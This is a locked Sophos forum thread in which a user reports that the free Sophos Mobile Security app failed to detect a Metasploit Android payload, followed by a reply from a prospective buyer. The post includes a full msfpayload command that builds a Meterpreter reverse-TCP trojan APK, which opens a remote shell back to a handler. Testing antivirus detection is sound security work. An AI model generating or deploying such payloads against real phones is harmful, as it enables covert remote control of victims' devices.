Guest User!

You are not Sophos Staff.

This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Free Sophos Mobile Security can't detect a metasploit payload

Hi, today I have been testing sophos mobile security - free edition. 

Well,
I create a well-know "trojan" with metasploit:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.121 LPORT=4444 R > /root/Desktop/wifi.apk
I installed it on my cell phone (android with free sophos mobile security 3.1.1.1245)
configure metasploit with multihandler and of course get a reverse meterprete shell on metasploit.
And sophos mobile security didn't alert me about it.
It shows: "MainActivity successfully scanned / MainActivity is clean"
You can find more information about it on:
So, Why Sophos mobile security can't alert about a well-know and public "trojan"?
:1015937


This thread was automatically locked due to age.
Parents
  • I am retiring my basic flip phone and joining the 21st Century with a new android phone.  One reason for my hesitation and delay in doing so has been security concerns.  The first app I am going to install will be an antivirus/security app.  Sophos mobile is in the top 3 following my research so I am very interested in the answer to this question. Anyone who has had the misfortune of finding a hacker/stalker in their lives or who has had their credit card number taken can relate to this concern.  I'm awaiting the answer to this.  I am also wondering about the other 2 contenders in my top 3.

    :1016253
Reply
  • I am retiring my basic flip phone and joining the 21st Century with a new android phone.  One reason for my hesitation and delay in doing so has been security concerns.  The first app I am going to install will be an antivirus/security app.  Sophos mobile is in the top 3 following my research so I am very interested in the answer to this question. Anyone who has had the misfortune of finding a hacker/stalker in their lives or who has had their credit card number taken can relate to this concern.  I'm awaiting the answer to this.  I am also wondering about the other 2 contenders in my top 3.

    :1016253
Children
No Data